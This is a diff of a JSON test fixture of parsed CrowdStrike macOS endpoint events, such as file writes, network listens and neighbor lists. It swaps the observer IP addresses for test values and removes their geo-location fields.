@@ -3917,21 +3418,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.165.30.176", - "vendor": "crowdstrike", - "ip": "208.165.30.176", "serial_number": "ffffffff44564c2f8d76394cb25c31ab", + "address": "67.43.156.13", "type": "agent", - "version": "1007.4.0013701.1" + "version": "1007.4.0013701.1", + "vendor": "crowdstrike", + "ip": "67.43.156.13" }, "@timestamp": "2021-07-07T17:04:38.379Z", "ecs": { 
@@ -3942,19 +3434,19 @@ "user2" ], "hosts": [ - "208.165.30.176" + "67.43.156.13" ], "hash": [ "3967242894" ], "ip": [ - "208.165.30.176" + "67.43.156.13" ] }, "event": { "action": "GroupIdentity", - "ingested": "2021-11-22T09:23:55.465746100Z", - "original": "{\"event_simpleName\":\"GroupIdentity\",\"GID\":\"242\",\"AuthenticationUuidAsString\":\"ABCDEFAB-CDEF-ABCD-EFAB-CDEF000000F2\",\"ConfigStateHash\":\"3967242894\",\"aip\":\"208.165.30.176\",\"AuthenticationId\":\"1119489580471877843\",\"UserPrincipal\":\"user2@dom1\",\"UserSid\":\"S-1-5-21-3852557355-3178143607-2040168074-1485\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"GroupIdentityMacV2\",\"id\":\"ffffffff-1111-11eb-9dc2-029257dbe83b\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffff44564c2f8d76394cb25c31ab\",\"AuthenticationUuid\":\"ABCDEFAB-CDEF-ABCD-EFAB-CDEF000000F2\",\"timestamp\":\"1625677478379\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", + "ingested": "2021-12-09T13:36:11.150867300Z", + "original": "{\"event_simpleName\":\"GroupIdentity\",\"GID\":\"242\",\"AuthenticationUuidAsString\":\"ABCDEFAB-CDEF-ABCD-EFAB-CDEF000000F2\",\"ConfigStateHash\":\"3967242894\",\"aip\":\"67.43.156.13\",\"AuthenticationId\":\"1119489580471877843\",\"UserPrincipal\":\"user2@dom1\",\"UserSid\":\"S-1-5-21-3852557355-3178143607-2040168074-1485\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"GroupIdentityMacV2\",\"id\":\"ffffffff-1111-11eb-9dc2-029257dbe83b\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffff44564c2f8d76394cb25c31ab\",\"AuthenticationUuid\":\"ABCDEFAB-CDEF-ABCD-EFAB-CDEF000000F2\",\"timestamp\":\"1625677478379\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "id": "ffffffff-1111-11eb-9dc2-029257dbe83b", "created": "2021-07-07T17:04:38.379Z" }, 
@@ -3995,21 +3487,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.165.30.176", - "vendor": "crowdstrike", - "ip": "208.165.30.176", "serial_number": "ffffffff44564c2f8d76394cb25c31ab", + "address": "67.43.156.13", "type": "agent", - "version": "1007.4.0013701.1" + "version": "1007.4.0013701.1", + "vendor": "crowdstrike", + "ip": "67.43.156.13" }, "@timestamp": "2021-07-07T01:50:11.845Z", "file": { 
@@ -4029,19 +3512,19 @@ }, "related": { "hosts": [ - "208.165.30.176" + "67.43.156.13" ], "hash": [ "c0f50d27fe9fb31e33d1ce6577eeb4d4e17639095ad20575da018d1fcf955198", "3967242894" ], "ip": [ - "208.165.30.176" + "67.43.156.13" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465752900Z", - "original": "{\"event_simpleName\":\"MachOFileWritten\",\"ContextTimeStamp\":\"1625622611.845\",\"ConfigStateHash\":\"3967242894\",\"MachOSubType\":\"3\",\"ContextProcessId\":\"364938429384226082\",\"Size\":\"0\",\"ContextThreadId\":\"0\",\"aip\":\"208.165.30.176\",\"SHA256HashData\":\"c0f50d27fe9fb31e33d1ce6577eeb4d4e17639095ad20575da018d1fcf955198\",\"FileIdentifier\":\"04000001000000000000000000000000ac41270400000000\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"MachOFileWrittenMacV3\",\"id\":\"ffffffff-1111-11eb-9dc2-029257dbe83b\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffff44564c2f8d76394cb25c31ab\",\"timestamp\":\"1625677479336\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"TargetFileName\":\"/private/var/folders/bf/dwpvdj3d1tq00l8fgs5rd7x00000gn/T/.net.example.desktop.ev80yl\"}", + "ingested": "2021-12-09T13:36:11.150873600Z", + "original": 
"{\"event_simpleName\":\"MachOFileWritten\",\"ContextTimeStamp\":\"1625622611.845\",\"ConfigStateHash\":\"3967242894\",\"MachOSubType\":\"3\",\"ContextProcessId\":\"364938429384226082\",\"Size\":\"0\",\"ContextThreadId\":\"0\",\"aip\":\"67.43.156.13\",\"SHA256HashData\":\"c0f50d27fe9fb31e33d1ce6577eeb4d4e17639095ad20575da018d1fcf955198\",\"FileIdentifier\":\"04000001000000000000000000000000ac41270400000000\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"MachOFileWrittenMacV3\",\"id\":\"ffffffff-1111-11eb-9dc2-029257dbe83b\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffff44564c2f8d76394cb25c31ab\",\"timestamp\":\"1625677479336\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"TargetFileName\":\"/private/var/folders/bf/dwpvdj3d1tq00l8fgs5rd7x00000gn/T/.net.example.desktop.ev80yl\"}", "created": "2021-07-07T17:04:39.336Z", "kind": "event", "action": "MachOFileWritten", @@ -4092,21 +3575,12 @@ "direction": "unknown" }, "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.165.30.176", - "vendor": "crowdstrike", - "ip": "208.165.30.176", "serial_number": "ffffffff44564c2f8d76394cb25c31ab", + "address": "67.43.156.13", "type": "agent", - "version": "1007.4.0013701.1" + "version": "1007.4.0013701.1", + "vendor": "crowdstrike", + "ip": "67.43.156.13" }, "@timestamp": "2021-07-07T01:50:08.014Z", "ecs": { 
@@ -4114,20 +3588,20 @@ }, "related": { "hosts": [ - "208.165.30.176", + "67.43.156.13", "0:0:0:0:0:0:0:0" ], "hash": [ "3967242894" ], "ip": [ - "208.165.30.176", + "67.43.156.13", "0:0:0:0:0:0:0:0" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465759600Z", - "original": "{\"event_simpleName\":\"NetworkListenIP6\",\"ContextTimeStamp\":\"1625622608.014\",\"LocalAddressIP6\":\"0:0:0:0:0:0:0:0\",\"RemoteAddressIP6\":\"0:0:0:0:0:0:0:0\",\"ConfigStateHash\":\"3967242894\",\"ConnectionFlags\":\"0\",\"ContextProcessId\":\"364938390018585510\",\"RemotePort\":\"0\",\"aip\":\"208.165.30.176\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"LocalPort\":\"8770\",\"Entitlements\":\"15\",\"name\":\"NetworkListenIP6MacV10\",\"id\":\"ffffffff-1111-11eb-9dc2-029257dbe83b\",\"Protocol\":\"6\",\"EffectiveTransmissionClass\":\"3\",\"aid\":\"ffffffff44564c2f8d76394cb25c31ab\",\"ConnectionDirection\":\"2\",\"InContext\":\"0\",\"timestamp\":\"1625677478929\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", + "ingested": "2021-12-09T13:36:11.150879900Z", + "original": "{\"event_simpleName\":\"NetworkListenIP6\",\"ContextTimeStamp\":\"1625622608.014\",\"LocalAddressIP6\":\"0:0:0:0:0:0:0:0\",\"RemoteAddressIP6\":\"0:0:0:0:0:0:0:0\",\"ConfigStateHash\":\"3967242894\",\"ConnectionFlags\":\"0\",\"ContextProcessId\":\"364938390018585510\",\"RemotePort\":\"0\",\"aip\":\"67.43.156.13\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"LocalPort\":\"8770\",\"Entitlements\":\"15\",\"name\":\"NetworkListenIP6MacV10\",\"id\":\"ffffffff-1111-11eb-9dc2-029257dbe83b\",\"Protocol\":\"6\",\"EffectiveTransmissionClass\":\"3\",\"aid\":\"ffffffff44564c2f8d76394cb25c31ab\",\"ConnectionDirection\":\"2\",\"InContext\":\"0\",\"timestamp\":\"1625677478929\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:04:38.929Z", "kind": "event", "action": "NetworkListenIP6", 
@@ -4152,24 +3626,12 @@ }, { "observer": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-CA", - "city_name": "San Francisco", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "California", - "location": { - "lon": -122.3874, - "lat": 37.7852 - } - }, - "address": "208.87.57.118", - "vendor": "crowdstrike", - "ip": "208.87.57.118", "serial_number": "ffffffff62714a708030d494ca0a7e60", + "address": "67.43.156.14", "type": "agent", - "version": "1007.4.0013701.1" + "version": "1007.4.0013701.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2021-07-07T17:05:02.693Z", "os": { 
@@ -4180,18 +3642,18 @@ }, "related": { "hosts": [ - "208.87.57.118" + "67.43.156.14" ], "hash": [ "3090255842" ], "ip": [ - "208.87.57.118" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465766300Z", - "original": "{\"event_simpleName\":\"CurrentSystemTags\",\"ConfigStateHash\":\"3090255842\",\"aip\":\"208.87.57.118\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"SystemTableIndex\":\"0\",\"Entitlements\":\"15\",\"name\":\"CurrentSystemTagsMacV1\",\"id\":\"ffffffff-1111-11eb-b88d-06b7cb0d7bd7\",\"EffectiveTransmissionClass\":\"0\",\"aid\":\"ffffffff62714a708030d494ca0a7e60\",\"Tags\":\"312, 11544872091698, 21990232555653, 21990232555859, 26388279066700, 26388279066703, 26388279066704, 26388279066705, 26388279066708, 26388279066849, 26388279066855, 26388279066948, 26388279066958, 26388279066970, 26388279067150, 26388279067174, 26388279067175, 26405458935929, 26405458935963, 26405458935964, 26405458936063, 26405458936087, 26405458936088, 26405458936130, 26405458936163, 26405458936164, 26405458936166, 26405458936167, 26405458936242, 26405458936306, 26405458936307, 26405458936357, 26405458936510, 26405458936511, 26405458936522, 26405458936523, 26422638805193, 26422638805230, 26422638805244, 26422638805245, 26422638805246, 26439818674539, 26439818674540, 26439818674541, 26439818674542, 26439818674543, 26439818674544, 26439818674614, 26439818674615, 26439818674616, 26439818674617, 26439818674678, 26439818674679, 26439818674680, 26439818674882, 26439818674883, 26439818674884, 26439818674894, 26439818674895, 26439818674896, 26456998543646, 26456998543647, 26456998543648, 26456998543649, 26456998543650, 26456998543651, 26456998543652, 26456998543653, 26456998543654, 26456998543656, 26456998543721, 26456998543722, 26456998543744, 26456998543793, 26456998543811, 26456998543903, 26456998543904, 26456998543950, 26456998543963, 26456998544000, 26456998544045, 26456998544086, 26456998544087, 26456998544115, 30803505447073, 30803505447074, 
30803505447075, 30803505447076, 30803505447077, 30803505447078, 30803505447194, 30803505447195, 30803505447196, 30803505447528, 30803505447529, 30803505447530, 30803505447532, 30803505447533, 30803505447534, 30803505447537, 30803505447538, 30803505447539, 30803505447541, 30803505447542, 30803505447543, 30803505447567, 30803505447568, 30803505447569, 30803505447571, 30803505447572, 30803505447573, 30803505447575, 30803505447576, 30803505447577, 30803505447579, 30803505447580, 30803505447581, 30803505447583, 30803505447584\",\"timestamp\":\"1625677502693\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", + "ingested": "2021-12-09T13:36:11.150886200Z", + "original": "{\"event_simpleName\":\"CurrentSystemTags\",\"ConfigStateHash\":\"3090255842\",\"aip\":\"67.43.156.14\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"SystemTableIndex\":\"0\",\"Entitlements\":\"15\",\"name\":\"CurrentSystemTagsMacV1\",\"id\":\"ffffffff-1111-11eb-b88d-06b7cb0d7bd7\",\"EffectiveTransmissionClass\":\"0\",\"aid\":\"ffffffff62714a708030d494ca0a7e60\",\"Tags\":\"312, 11544872091698, 21990232555653, 21990232555859, 26388279066700, 26388279066703, 26388279066704, 26388279066705, 26388279066708, 26388279066849, 26388279066855, 26388279066948, 26388279066958, 26388279066970, 26388279067150, 26388279067174, 26388279067175, 26405458935929, 26405458935963, 26405458935964, 26405458936063, 26405458936087, 26405458936088, 26405458936130, 26405458936163, 26405458936164, 26405458936166, 26405458936167, 26405458936242, 26405458936306, 26405458936307, 26405458936357, 26405458936510, 26405458936511, 26405458936522, 26405458936523, 26422638805193, 26422638805230, 26422638805244, 26422638805245, 26422638805246, 26439818674539, 26439818674540, 26439818674541, 26439818674542, 26439818674543, 26439818674544, 26439818674614, 26439818674615, 26439818674616, 26439818674617, 26439818674678, 26439818674679, 26439818674680, 26439818674882, 26439818674883, 26439818674884, 26439818674894, 
26439818674895, 26439818674896, 26456998543646, 26456998543647, 26456998543648, 26456998543649, 26456998543650, 26456998543651, 26456998543652, 26456998543653, 26456998543654, 26456998543656, 26456998543721, 26456998543722, 26456998543744, 26456998543793, 26456998543811, 26456998543903, 26456998543904, 26456998543950, 26456998543963, 26456998544000, 26456998544045, 26456998544086, 26456998544087, 26456998544115, 30803505447073, 30803505447074, 30803505447075, 30803505447076, 30803505447077, 30803505447078, 30803505447194, 30803505447195, 30803505447196, 30803505447528, 30803505447529, 30803505447530, 30803505447532, 30803505447533, 30803505447534, 30803505447537, 30803505447538, 30803505447539, 30803505447541, 30803505447542, 30803505447543, 30803505447567, 30803505447568, 30803505447569, 30803505447571, 30803505447572, 30803505447573, 30803505447575, 30803505447576, 30803505447577, 30803505447579, 30803505447580, 30803505447581, 30803505447583, 30803505447584\",\"timestamp\":\"1625677502693\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:05:02.693Z", "kind": "state", "action": "CurrentSystemTags", @@ -4357,21 +3819,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.24.116.10", - "vendor": "crowdstrike", - "ip": "208.24.116.10", "serial_number": "ffffffff28414c2293e35c360213e723", + "address": "67.43.156.14", "type": "agent", - "version": "1007.4.0013701.1" + "version": "1007.4.0013701.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2021-07-07T17:05:33.027Z", "file": { 
@@ -4389,19 +3842,19 @@ }, "related": { "hosts": [ - "208.24.116.10" + "67.43.156.14" ], "hash": [ "70a06a11057efb22285a7200a53e5b6bae001fe0a98d4b23d0f6a31ad818a005", "1620585913" ], "ip": [ - "208.24.116.10" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465773100Z", - "original": "{\"event_simpleName\":\"NewExecutableWritten\",\"ContextTimeStamp\":\"1625677533.027\",\"ConfigStateHash\":\"1620585913\",\"ContextProcessId\":\"362208380891022165\",\"Size\":\"596224\",\"ContextThreadId\":\"0\",\"aip\":\"208.24.116.10\",\"SHA256HashData\":\"70a06a11057efb22285a7200a53e5b6bae001fe0a98d4b23d0f6a31ad818a005\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"NewExecutableWrittenMacV2\",\"id\":\"ffffffff-1111-11eb-985c-02152dd35bc1\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffff28414c2293e35c360213e723\",\"timestamp\":\"1625677533060\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"TargetFileName\":\"/private/var/folders/3c/z7j1h7dx3nz3xkl10c1vyxgh0000gp/T/.com.google.Chrome.CVG7Ya/Zoom.app/Contents/MacOS/app_mode_loader\",\"VnodeModificationType\":\"0\"}", + "ingested": "2021-12-09T13:36:11.150892800Z", + "original": 
"{\"event_simpleName\":\"NewExecutableWritten\",\"ContextTimeStamp\":\"1625677533.027\",\"ConfigStateHash\":\"1620585913\",\"ContextProcessId\":\"362208380891022165\",\"Size\":\"596224\",\"ContextThreadId\":\"0\",\"aip\":\"67.43.156.14\",\"SHA256HashData\":\"70a06a11057efb22285a7200a53e5b6bae001fe0a98d4b23d0f6a31ad818a005\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"NewExecutableWrittenMacV2\",\"id\":\"ffffffff-1111-11eb-985c-02152dd35bc1\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffff28414c2293e35c360213e723\",\"timestamp\":\"1625677533060\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"TargetFileName\":\"/private/var/folders/3c/z7j1h7dx3nz3xkl10c1vyxgh0000gp/T/.com.google.Chrome.CVG7Ya/Zoom.app/Contents/MacOS/app_mode_loader\",\"VnodeModificationType\":\"0\"}", "created": "2021-07-07T17:05:33.060Z", "kind": "event", "action": "NewExecutableWritten", @@ -4434,21 +3887,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.137.65.223", - "vendor": "crowdstrike", - "ip": "208.137.65.223", "serial_number": "fffffffffbea48169985c2c2bae89d1d", + "address": "67.43.156.14", "type": "agent", - "version": "1007.4.0013701.1" + "version": "1007.4.0013701.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2021-07-07T17:03:48.827Z", "file": { 
@@ -4463,19 +3907,19 @@ }, "related": { "hosts": [ - "208.137.65.223" + "67.43.156.14" ], "hash": [ "d7b56e2a06304ecd343985a1aaedff2eb32ee1151bba0e152aff97c778b7562a", "3090255842" ], "ip": [ - "208.137.65.223" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465779900Z", - "original": "{\"event_simpleName\":\"LfoUploadDataComplete\",\"LfoUploadFlags\":\"4\",\"AttemptNumber\":\"0\",\"ConfigStateHash\":\"3090255842\",\"SourceFileName\":\"/Users/user5/.rbenv/versions/2.6.5/bin/ruby\",\"Size\":\"3876424\",\"aip\":\"208.137.65.223\",\"SHA256HashData\":\"d7b56e2a06304ecd343985a1aaedff2eb32ee1151bba0e152aff97c778b7562a\",\"UploadId\":\"8023668629276690295\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"LfoUploadDataCompleteMacV3\",\"id\":\"ffffffff-1111-11eb-a2ab-024aafff599f\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"fffffffffbea48169985c2c2bae89d1d\",\"Tags\":\"312, 11544872091698, 21990232555653, 21990232555859, 26388279066700, 26388279066703, 26388279066704, 26388279066705, 26388279066708, 26388279066849, 26388279066855, 26388279066948, 26388279066958, 26388279066970, 26388279067150, 26388279067174, 26388279067175, 26405458935929, 26405458935963, 26405458935964, 26405458936063, 26405458936087, 26405458936088, 26405458936130, 26405458936163, 26405458936164, 26405458936166, 26405458936167, 26405458936242, 26405458936306, 26405458936307, 26405458936357, 26405458936510, 26405458936511, 26405458936522, 26405458936523, 26422638805193, 26422638805230, 26422638805244, 26422638805245, 26422638805246, 26439818674539, 26439818674540, 26439818674541, 26439818674542, 26439818674543, 26439818674544, 26439818674614, 26439818674615, 26439818674616, 26439818674617, 26439818674678, 26439818674679, 26439818674680, 26439818674882, 26439818674883, 26439818674884, 26439818674894, 26439818674895, 26439818674896, 26456998543646, 26456998543647, 26456998543648, 26456998543649, 26456998543650, 26456998543651, 
26456998543652, 26456998543653, 26456998543654, 26456998543656, 26456998543721, 26456998543722, 26456998543744, 26456998543793, 26456998543811, 26456998543903, 26456998543904, 26456998543950, 26456998543963, 26456998544000, 26456998544045, 26456998544086, 26456998544087, 26456998544115, 30803505447073, 30803505447074, 30803505447075, 30803505447076, 30803505447077, 30803505447078, 30803505447194, 30803505447195, 30803505447196, 30803505447528, 30803505447529, 30803505447530, 30803505447532, 30803505447533, 30803505447534, 30803505447537, 30803505447538, 30803505447539, 30803505447541, 30803505447542, 30803505447543, 30803505447567, 30803505447568, 30803505447569, 30803505447571, 30803505447572, 30803505447573, 30803505447575, 30803505447576, 30803505447577, 30803505447579, 30803505447580, 30803505447581, 30803505447583, 30803505447584\",\"timestamp\":\"1625677428827\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", + "ingested": "2021-12-09T13:36:11.150899200Z", + "original": "{\"event_simpleName\":\"LfoUploadDataComplete\",\"LfoUploadFlags\":\"4\",\"AttemptNumber\":\"0\",\"ConfigStateHash\":\"3090255842\",\"SourceFileName\":\"/Users/user5/.rbenv/versions/2.6.5/bin/ruby\",\"Size\":\"3876424\",\"aip\":\"67.43.156.14\",\"SHA256HashData\":\"d7b56e2a06304ecd343985a1aaedff2eb32ee1151bba0e152aff97c778b7562a\",\"UploadId\":\"8023668629276690295\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"LfoUploadDataCompleteMacV3\",\"id\":\"ffffffff-1111-11eb-a2ab-024aafff599f\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"fffffffffbea48169985c2c2bae89d1d\",\"Tags\":\"312, 11544872091698, 21990232555653, 21990232555859, 26388279066700, 26388279066703, 26388279066704, 26388279066705, 26388279066708, 26388279066849, 26388279066855, 26388279066948, 26388279066958, 26388279066970, 26388279067150, 26388279067174, 26388279067175, 26405458935929, 26405458935963, 26405458935964, 26405458936063, 26405458936087, 26405458936088, 
26405458936130, 26405458936163, 26405458936164, 26405458936166, 26405458936167, 26405458936242, 26405458936306, 26405458936307, 26405458936357, 26405458936510, 26405458936511, 26405458936522, 26405458936523, 26422638805193, 26422638805230, 26422638805244, 26422638805245, 26422638805246, 26439818674539, 26439818674540, 26439818674541, 26439818674542, 26439818674543, 26439818674544, 26439818674614, 26439818674615, 26439818674616, 26439818674617, 26439818674678, 26439818674679, 26439818674680, 26439818674882, 26439818674883, 26439818674884, 26439818674894, 26439818674895, 26439818674896, 26456998543646, 26456998543647, 26456998543648, 26456998543649, 26456998543650, 26456998543651, 26456998543652, 26456998543653, 26456998543654, 26456998543656, 26456998543721, 26456998543722, 26456998543744, 26456998543793, 26456998543811, 26456998543903, 26456998543904, 26456998543950, 26456998543963, 26456998544000, 26456998544045, 26456998544086, 26456998544087, 26456998544115, 30803505447073, 30803505447074, 30803505447075, 30803505447076, 30803505447077, 30803505447078, 30803505447194, 30803505447195, 30803505447196, 30803505447528, 30803505447529, 30803505447530, 30803505447532, 30803505447533, 30803505447534, 30803505447537, 30803505447538, 30803505447539, 30803505447541, 30803505447542, 30803505447543, 30803505447567, 30803505447568, 30803505447569, 30803505447571, 30803505447572, 30803505447573, 30803505447575, 30803505447576, 30803505447577, 30803505447579, 30803505447580, 30803505447581, 30803505447583, 30803505447584\",\"timestamp\":\"1625677428827\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:03:48.827Z", "kind": "event", "action": "LfoUploadDataComplete", 
@@ -4622,24 +4066,12 @@ }, { "observer": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-IL", - "city_name": "Chicago", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Illinois", - "location": { - "lon": -87.6589, - "lat": 41.8719 - } - }, - "address": "208.100.38.84", - "vendor": "crowdstrike", - "ip": "208.100.38.84", "serial_number": "ffffffffd452449b8d1eb7d85b146650", + "address": "67.43.156.14", "type": "agent", - "version": "1007.4.0013701.1" + "version": "1007.4.0013701.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2021-07-07T17:04:13.146Z", "os": { 
@@ -4650,19 +4082,19 @@ }, "related": { "hosts": [ - "208.100.38.84" + "67.43.156.14" ], "hash": [ "3090255842" ], "ip": [ - "208.100.38.84" + "67.43.156.14" ] }, "event": { "action": "LightningLatencyInfo", - "ingested": "2021-11-22T09:23:55.465786600Z", - "original": "{\"event_simpleName\":\"LightningLatencyInfo\",\"LightningLatencyState\":\"3\",\"ConfigStateHash\":\"3090255842\",\"aip\":\"208.100.38.84\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"LightningLatencyInfoMacV1\",\"id\":\"ffffffff-1111-11eb-b44e-069a02b0ad6b\",\"EffectiveTransmissionClass\":\"0\",\"aid\":\"ffffffffd452449b8d1eb7d85b146650\",\"timestamp\":\"1625677453146\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", + "ingested": "2021-12-09T13:36:11.150905600Z", + "original": "{\"event_simpleName\":\"LightningLatencyInfo\",\"LightningLatencyState\":\"3\",\"ConfigStateHash\":\"3090255842\",\"aip\":\"67.43.156.14\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"LightningLatencyInfoMacV1\",\"id\":\"ffffffff-1111-11eb-b44e-069a02b0ad6b\",\"EffectiveTransmissionClass\":\"0\",\"aid\":\"ffffffffd452449b8d1eb7d85b146650\",\"timestamp\":\"1625677453146\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "id": "ffffffff-1111-11eb-b44e-069a02b0ad6b", "created": "2021-07-07T17:04:13.146Z" }, @@ -4683,21 +4115,12 @@ }, { "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.93.56.66", - "vendor": "crowdstrike", - "ip": "208.93.56.66", "serial_number": "ffffffff8eb649cf8d82be1e65629a0e", + "address": "67.43.156.14", "type": "agent", - "version": "1007.4.0013701.1" + "version": "1007.4.0013701.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2021-07-07T17:04:10.083Z", "os": { 
@@ -4708,18 +4131,18 @@ }, "related": { "hosts": [ - "208.93.56.66" + "67.43.156.14" ], "hash": [ "1620585913" ], "ip": [ - "208.93.56.66" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465793300Z", - "original": "{\"event_simpleName\":\"NeighborListIP4\",\"ConfigStateHash\":\"1620585913\",\"NeighborList\":\"40-C7-29-FF-FF-FF|192.168.2.1|1|64-9A-BE-FF-FF-FF|192.168.2.10|0|F0-FF-FF-FF-A0-14|192.168.2.43|0|DE-58-FF-FF-5D-3B|192.168.2.113|0|5E-AA-FF-FF-FF-20|192.168.2.128|0|44-FF-FF-FF-03-DD|192.168.2.136|0|EE-74-EE-EE-FF-0D|192.168.2.137|0|3A-FF-FF-FF-03-26|192.168.2.144|0|DE-79-FF-FF-FF-D4|192.168.2.145|0|0E-24-FF-EE-EE-87|192.168.2.152|0|CC-D9-AC-AF-66-F8|192.168.2.153|0|\",\"aip\":\"208.93.56.66\",\"InterfaceIndex\":\"6\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"NeighborListIP4MacV1\",\"id\":\"ffffffff-1111-11eb-9dc0-06c6f5278873\",\"EffectiveTransmissionClass\":\"3\",\"aid\":\"ffffffff8eb649cf8d82be1e65629a0e\",\"timestamp\":\"1625677450083\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", + "ingested": "2021-12-09T13:36:11.150911900Z", + "original": "{\"event_simpleName\":\"NeighborListIP4\",\"ConfigStateHash\":\"1620585913\",\"NeighborList\":\"40-C7-29-FF-FF-FF|192.168.2.1|1|64-9A-BE-FF-FF-FF|192.168.2.10|0|F0-FF-FF-FF-A0-14|192.168.2.43|0|DE-58-FF-FF-5D-3B|192.168.2.113|0|5E-AA-FF-FF-FF-20|192.168.2.128|0|44-FF-FF-FF-03-DD|192.168.2.136|0|EE-74-EE-EE-FF-0D|192.168.2.137|0|3A-FF-FF-FF-03-26|192.168.2.144|0|DE-79-FF-FF-FF-D4|192.168.2.145|0|0E-24-FF-EE-EE-87|192.168.2.152|0|CC-D9-AC-AF-66-F8|192.168.2.153|0|\",\"aip\":\"67.43.156.14\",\"InterfaceIndex\":\"6\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"NeighborListIP4MacV1\",\"id\":\"ffffffff-1111-11eb-9dc0-06c6f5278873\",\"EffectiveTransmissionClass\":\"3\",\"aid\":\"ffffffff8eb649cf8d82be1e65629a0e\",\"timestamp\":\"1625677450083\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", 
